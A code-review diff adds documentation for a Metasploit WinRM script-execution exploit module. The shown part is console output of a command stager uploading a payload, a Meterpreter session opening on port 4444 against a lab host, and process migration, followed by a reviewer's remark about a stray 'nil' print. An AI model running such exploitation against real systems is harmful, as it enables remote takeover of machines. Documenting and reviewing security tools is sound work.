documentation/modules/exploit/winrm/winrm_script_exec.md

```diff
@@ -0,0 +1,146 @@
+[*] Command Stager progress -  22.08% done (22506/101936 bytes)
+[*] Command Stager progress -  24.09% done (24552/101936 bytes)
+[*] Command Stager progress -  26.09% done (26598/101936 bytes)
+[*] Command Stager progress -  28.10% done (28644/101936 bytes)
+[*] Command Stager progress -  30.11% done (30690/101936 bytes)
+[*] Command Stager progress -  32.11% done (32736/101936 bytes)
+[*] Command Stager progress -  34.12% done (34782/101936 bytes)
+[*] Command Stager progress -  36.13% done (36828/101936 bytes)
+[*] Command Stager progress -  38.14% done (38874/101936 bytes)
+[*] Command Stager progress -  40.14% done (40920/101936 bytes)
+[*] Command Stager progress -  42.15% done (42966/101936 bytes)
+[*] Command Stager progress -  44.16% done (45012/101936 bytes)
+[*] Command Stager progress -  46.16% done (47058/101936 bytes)
+[*] Command Stager progress -  48.17% done (49104/101936 bytes)
+[*] Command Stager progress -  50.18% done (51150/101936 bytes)
+[*] Command Stager progress -  52.19% done (53196/101936 bytes)
+[*] Command Stager progress -  54.19% done (55242/101936 bytes)
+[*] Command Stager progress -  56.20% done (57288/101936 bytes)
+[*] Command Stager progress -  58.21% done (59334/101936 bytes)
+[*] Command Stager progress -  60.21% done (61380/101936 bytes)
+[*] Command Stager progress -  62.22% done (63426/101936 bytes)
+[*] Command Stager progress -  64.23% done (65472/101936 bytes)
+[*] Command Stager progress -  66.24% done (67518/101936 bytes)
+[*] Command Stager progress -  68.24% done (69564/101936 bytes)
+[*] Command Stager progress -  70.25% done (71610/101936 bytes)
+[*] Command Stager progress -  72.26% done (73656/101936 bytes)
+[*] Command Stager progress -  74.26% done (75702/101936 bytes)
+[*] Command Stager progress -  76.27% done (77748/101936 bytes)
+[*] Command Stager progress -  78.28% done (79794/101936 bytes)
+[*] Command Stager progress -  80.29% done (81840/101936 bytes)
+[*] Command Stager progress -  82.29% done (83886/101936 bytes)
+[*] Command Stager progress -  84.30% done (85932/101936 bytes)
+[*] Command Stager progress -  86.31% done (87978/101936 bytes)
+[*] Command Stager progress -  88.31% done (90024/101936 bytes)
+[*] Command Stager progress -  90.32% done (92070/101936 bytes)
+[*] Command Stager progress -  92.33% done (94116/101936 bytes)
+[*] Command Stager progress -  94.34% done (96162/101936 bytes)
+[*] Command Stager progress -  96.34% done (98208/101936 bytes)
+[*] Command Stager progress -  98.35% done (100252/101936 bytes)
+[*] Sending stage (752128 bytes) to 192.168.198.130
+[*] Meterpreter session 2 opened (192.168.198.138:4444 -> 192.168.198.130:5985) at 2017-03-19 21:46:05 +0100
+[*] Session ID 2 (192.168.198.138:4444 -> 192.168.1.142:49158) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
+[*] Current server process: mSPvA.exe (3548)
+[+] Migrating to 580
+[+] Successfully migrated to process 
+[*] nil
```

Comment:
this line is funny to me, nothing you did, but prob a print in the module that didn't check it was nil before printing it. at least it didn't crash!